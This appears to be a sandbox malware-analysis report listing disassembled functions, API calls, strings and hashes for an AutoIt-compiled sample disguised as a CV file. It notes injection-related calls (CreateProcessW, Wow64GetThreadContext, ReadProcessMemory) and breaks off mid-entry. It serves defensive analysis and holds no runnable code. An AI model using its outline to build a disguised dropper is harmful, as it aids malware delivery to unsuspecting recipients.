Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 009182554dbcda3aee82c8e8a453ce7dd807dc76647a83924a86b5ef30df8dcb
Instruction ID: 9aa10106f9843c1d3ff1c433f634d6ead55997bf3cd798fcffa44a50038be3ea
Opcode Fuzzy Hash: 009182554dbcda3aee82c8e8a453ce7dd807dc76647a83924a86b5ef30df8dcb
Instruction Fuzzy Hash: 19F03A719442D87AE7326B57AC18E672E7DD7C6F28F60011ABB08A21A0C1650881CAB0

Function 01375AF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 013759E0: Sleep.KERNELBASE(000001F4), ref: 013759F1

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01375C10

Strings

PSY56F4G3NLJ4IJT7Z, xrefs: 01375C73, 01375C76

Memory Dump Source

Source File: 00000000.00000002.1771378123.0000000001373000.00000040.00000020.00020000.00000000.sdmp, Offset: 01373000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1373000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CreateFileSleep
String ID: PSY56F4G3NLJ4IJT7Z
API String ID: 2694422964-3823802600
Opcode ID: 656dd2a8c9ce95ee33fea39b168fd290600165b9cd9da4a55ce8d42b5df7cd62
Instruction ID: eda95a58edef428f0c852a17cf8008389702fbc808e32eabcb86e62cbf4cf5f4
Opcode Fuzzy Hash: 656dd2a8c9ce95ee33fea39b168fd290600165b9cd9da4a55ce8d42b5df7cd62
Instruction Fuzzy Hash: 41519170D04249EBEF25DBB4C955BEEBBB9AF15304F004199E204BB2C0D6795B44CBA5

Function 002F4A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 002F5374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,003B1148,?,002F61FF,?,00000000,00000001,00000000), ref: 002F5392

Part of subcall function 002F49FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 002F4A1D

_wcscat.LIBCMT ref: 00362D80
_wcscat.LIBCMT ref: 00362DB5

Strings

\, xrefs: 00362DA2
\Include\, xrefs: 002F4B0A
8!;, xrefs: 002F4B1C

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!;$\$\Include\
API String ID: 3592542968-2314511254
Opcode ID: 865536e9402aaebb0810f3be978873b30abda0937a64d95ac76fda1b2ff92742
Instruction ID: bf408e992c3de1505e1ef3f83fa5294c692d5c929a35e90d5e32f00fdbdaf53b
Opcode Fuzzy Hash: 865536e9402aaebb0810f3be978873b30abda0937a64d95ac76fda1b2ff92742
Instruction Fuzzy Hash: 50516C754143449B8316EF59E9818ABB3FCFE59348F404B2EF748972A1EB709A48CF52

Function 002F51AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002F522F
_wcscpy.LIBCMT ref: 002F5283
Shell_NotifyIconW.SHELL32(00000001,?), ref: 002F5293
LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00363CB0

Strings

Line: , xrefs: 00363CD9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memset_wcscpy
String ID: Line:
API String ID: 1053898822-1585850449
Opcode ID: e06bb6722ec326e31b4e102a745e0eb917a17b32465ac0a0d87fa0324577c4df
Instruction ID: 6c90048e6606b2c2287a2b058cf03e43755ac45f4d9f1457f0cd51e7259773d5
Opcode Fuzzy Hash: e06bb6722ec326e31b4e102a745e0eb917a17b32465ac0a0d87fa0324577c4df
Instruction Fuzzy Hash: 3731E4310183586FD322EB50DC46FEBB7DCAF44384F00462EF78992091DBB0A668CB92

Function 002F4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 002F41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,002F39FE,?,00000001), ref: 002F41DB

_free.LIBCMT ref: 003636B7
_free.LIBCMT ref: 003636FE

Part of subcall function 002FC833: __wsplitpath.LIBCMT ref: 002FC93E
Part of subcall function 002FC833: _wcscpy.LIBCMT ref: 002FC953
Part of subcall function 002FC833: _wcscat.LIBCMT ref: 002FC968
Part of subcall function 002FC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 002FC978

Strings

Bad directive syntax error, xrefs: 003636E4
>>>AUTOIT SCRIPT<<<, xrefs: 00363491

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: 05f49cb2b37fa2d6bff039149e0eb028f78f9b524064e1c663d949817d36bb46
Instruction ID: f97b51f7b30b57323fea79212ee91a7107b57d50409d1b466deb9ec4fb69f57e
Opcode Fuzzy Hash: 05f49cb2b37fa2d6bff039149e0eb028f78f9b524064e1c663d949817d36bb46
Instruction Fuzzy Hash: 03915B71910219AFCF06EFA4CC919FEB7B4BF09350F10842AF916AB295DB749A54CF90

Function 002F40E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00363725
GetOpenFileNameW.COMDLG32 ref: 0036376F

Part of subcall function 002F660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002F53B1,?,?,002F61FF,?,00000000,00000001,00000000), ref: 002F662F

Part of subcall function 002F40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 002F40C6

Strings

t3:, xrefs: 00363745
X, xrefs: 0036373E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X$t3:
API String ID: 3777226403-2156803952
Opcode ID: d9e3cae19948bdf3928a973f2245aa9070fd2a6163b25cf9dfdd31463882be4e
Instruction ID: 6271b19445ea538a85b9d8a91dda9373eb25ca7af6e1c628cff72d1e236244bc
Opcode Fuzzy Hash: d9e3cae19948bdf3928a973f2245aa9070fd2a6163b25cf9dfdd31463882be4e
Instruction Fuzzy Hash: 0A219671A1015CABCF16EFD8D8457EFBBF89F49304F004069E509A7241DBF45A898F65

Function 003134AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 003134FE

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00313539
__wopenfile.LIBCMT ref: 00313549

Strings

<G, xrefs: 003134CD, 003134F0, 003134FC

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
String ID: <G
API String ID: 1820251861-2138716496
Opcode ID: 3084ce869c00be53feb36bbf0acf4a8e284af1b9ab563b7d1c8a559cc39434ff
Instruction ID: 1ed54dbc44d61a0ebcb91da0b6dc8673b5dd2941510b73b84324b32530d0f439
Opcode Fuzzy Hash: 3084ce869c00be53feb36bbf0acf4a8e284af1b9ab563b7d1c8a559cc39434ff
Instruction Fuzzy Hash: 4E113A70A002069BDB1BBFB18C026EE76B5AF0E750B158425E814DF181EF30CAC197B1

Function 0030D298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0030D28B,SwapMouseButtons,00000004,?), ref: 0030D2BC
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0030D28B,SwapMouseButtons,00000004,?,?,?,?,0030C865), ref: 0030D2DD
RegCloseKey.KERNELBASE(00000000,?,?,0030D28B,SwapMouseButtons,00000004,?,?,?,?,0030C865), ref: 0030D2FF

Strings

Control Panel\Mouse, xrefs: 0030D2BA

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: d45ab254f5a5eea85e3a8644b95748baa03a0f78e2c871644730c6d512c459b3
Instruction ID: b798ffcf4c3047aeaecd1187e9dab8e412daa1547c6960fe9270b1308370cca1
Opcode Fuzzy Hash: d45ab254f5a5eea85e3a8644b95748baa03a0f78e2c871644730c6d512c459b3
Instruction Fuzzy Hash: 2E113979612208BFDB228FA8DC94EAF7BFCEF44744F104869E805D7150E731AE419B60

Function 013749E0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 0137519B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01375231
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01375253

Memory Dump Source

Source File: 00000000.00000002.1771378123.0000000001373000.00000040.00000020.00020000.00000000.sdmp, Offset: 01373000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1373000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: b6ce40e55203666a05e9f94e83d6941053758cd460982aee7b70e3455568adf9
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: B2621C30A14658DBEB24CFA4C850BDEB776EF58304F1091A9D20DEB390E7799E81CB59

Function 0033C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON

Download Yara Rule

APIs

Part of subcall function 002F4517: _fseek.LIBCMT ref: 002F452F

Part of subcall function 0033C56D: _wcscmp.LIBCMT ref: 0033C65D
Part of subcall function 0033C56D: _wcscmp.LIBCMT ref: 0033C670

_free.LIBCMT ref: 0033C4DD
_free.LIBCMT ref: 0033C4E4
_free.LIBCMT ref: 0033C54F

Part of subcall function 00311C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00317A85), ref: 00311CB1
Part of subcall function 00311C9D: GetLastError.KERNEL32(00000000,?,00317A85), ref: 00311CC3

_free.LIBCMT ref: 0033C557

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID:
API String ID: 1552873950-0
Opcode ID: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
Instruction ID: cc33015f1b40223ccbffe50b0f1b1ec9b6e87948644a7185e0bb44091029d8d6
Opcode Fuzzy Hash: acbc9bddfc27afc87d88584c9959c104a0ea567534d53ec5d359cc2505f852cb
Instruction Fuzzy Hash: 68514CB1914218AFDF259F65DC81BEEBBB9EF48300F1000AEF259B7241DB715A908F59

Function 0030EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0030EBB2

Part of subcall function 002F51AF: _memset.LIBCMT ref: 002F522F
Part of subcall function 002F51AF: _wcscpy.LIBCMT ref: 002F5283
Part of subcall function 002F51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 002F5293

KillTimer.USER32(?,00000001,?,?), ref: 0030EC07
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0030EC16
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00363C88

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: d545e5f325c810dd8e01f655444335ef6e476d859d71f02caf67bc56273ea540
Instruction ID: c46b9e022b33b12eb97b0ffca32aacc320dc1bdba9cf0c0451aee99d2b15a601
Opcode Fuzzy Hash: d545e5f325c810dd8e01f655444335ef6e476d859d71f02caf67bc56273ea540
Instruction Fuzzy Hash: 0C21C5705047949FE733DB288869BE7BBFC9B45308F05048DE68E66185C3756A848B51

Function 0033C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?), ref: 0033C72F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0033C746

Strings

aut, xrefs: 0033C740

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 087a9282af0afd8888491f43ed0dcbe9f50c7e6ead3e4130b56caa1e5bf1d4ab
Instruction ID: 10af0742ae07b7aee57464ace5b0858a927985cba092be8da59b11c9a1318280
Opcode Fuzzy Hash: 087a9282af0afd8888491f43ed0dcbe9f50c7e6ead3e4130b56caa1e5bf1d4ab
Instruction Fuzzy Hash: 33D05E7154030EABDB61AB90DC0EFCAB77C9B04704F0005A0B654A50B2DBB0E6DA8B54

Function 0034F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42533045a199ecf502ed6efac3982ce93d6ab769971c6a32c2811da70f337644
Instruction ID: 66e7d7d51f2bb3975fce625c23965cc687778cb3110856c89ba52ada6560aa34
Opcode Fuzzy Hash: 42533045a199ecf502ed6efac3982ce93d6ab769971c6a32c2811da70f337644
Instruction Fuzzy Hash: F0F16971A083019FC711DF28C895B6AB7E5FF89314F14892EF9999B292D730E945CF82

Function 002F4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002F5022
Shell_NotifyIconW.SHELL32(00000000,?), ref: 002F50CB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: IconNotifyShell__memset
String ID:
API String ID: 928536360-0
Opcode ID: 9aec02e779299d8607b610d8608e7abd8324a31473e0fd21744daddca7167330
Instruction ID: c5e4a723df8b0d12786fba92b0435e7d4a5a9317b4137d1b5d767ae717265799
Opcode Fuzzy Hash: 9aec02e779299d8607b610d8608e7abd8324a31473e0fd21744daddca7167330
Instruction Fuzzy Hash: E73180B1614715DFC722EF24D8456A7BBE8FF48348F00092EF79A86241EB716954CB92

Function 0031395C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00313973

Part of subcall function 003181C2: __NMSG_WRITE.LIBCMT ref: 003181E9
Part of subcall function 003181C2: __NMSG_WRITE.LIBCMT ref: 003181F3

__NMSG_WRITE.LIBCMT ref: 0031397A

Part of subcall function 0031821F: GetModuleFileNameW.KERNEL32(00000000,003B0312,00000104,00000000,00000001,00000000), ref: 003182B1
Part of subcall function 0031821F: ___crtMessageBoxW.LIBCMT ref: 0031835F

Part of subcall function 00311145: ___crtCorExitProcess.LIBCMT ref: 0031114B
Part of subcall function 00311145: ExitProcess.KERNEL32 ref: 00311154

Part of subcall function 00317C0E: __getptd_noexit.LIBCMT ref: 00317C0E

RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000001,00000000,?,?,0030F507,?,0000000E), ref: 0031399F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 066b4d1ccacb255bb3497c1060535597d76fafa6bec8f5bb8246c9807a24e742
Instruction ID: a4bef5456f72985278d355dcffb292b57ab449284d61b162568554e2614af532
Opcode Fuzzy Hash: 066b4d1ccacb255bb3497c1060535597d76fafa6bec8f5bb8246c9807a24e742
Instruction Fuzzy Hash: D9019236245211AAE62F3B35DC42BEA335C9B8D764F620125F6059F592DFB4DEC086A0

Function 0033C6D9 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,0033C385,?,?,?,?,?,00000004), ref: 0033C6F2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,0033C385,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 0033C708
CloseHandle.KERNEL32(00000000,?,0033C385,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0033C70F

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: c7e3ea11f069446003fda289127ffd2f8cadfb0a0524d9cca4112fc06772c373
Instruction ID: 4bee8c450732729b3e3299bf88cd1a7fa5bc091d0d586915624ca7d1cf47f7db
Opcode Fuzzy Hash: c7e3ea11f069446003fda289127ffd2f8cadfb0a0524d9cca4112fc06772c373
Instruction Fuzzy Hash: 82E08632140214BBE7322B54AC0AFCA7B6DAF05761F104110FB58790E097B125518798

Function 0033BB64 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0033BB72

Part of subcall function 00311C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00317A85), ref: 00311CB1
Part of subcall function 00311C9D: GetLastError.KERNEL32(00000000,?,00317A85), ref: 00311CC3

_free.LIBCMT ref: 0033BB83
_free.LIBCMT ref: 0033BB95

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
Instruction ID: 9ff8b581f833f4ef6ff964442d1dced6ba4dd428167dee8a98f123ed38681bbc
Opcode Fuzzy Hash: 8d6c99314b0704041c66cbc9d98ad607d1a0ae96d99a55b8255782f8bd4ba31d
Instruction Fuzzy Hash: 12E05BA174174147DA3965796E85EF7E3CC4F08351F15081DB759EB146CF24F88085F4

Function 002F2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 002F22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002F24F1), ref: 002F2303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002F25A1
CoInitialize.OLE32(00000000), ref: 002F2618
CloseHandle.KERNEL32(00000000), ref: 0036503A

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
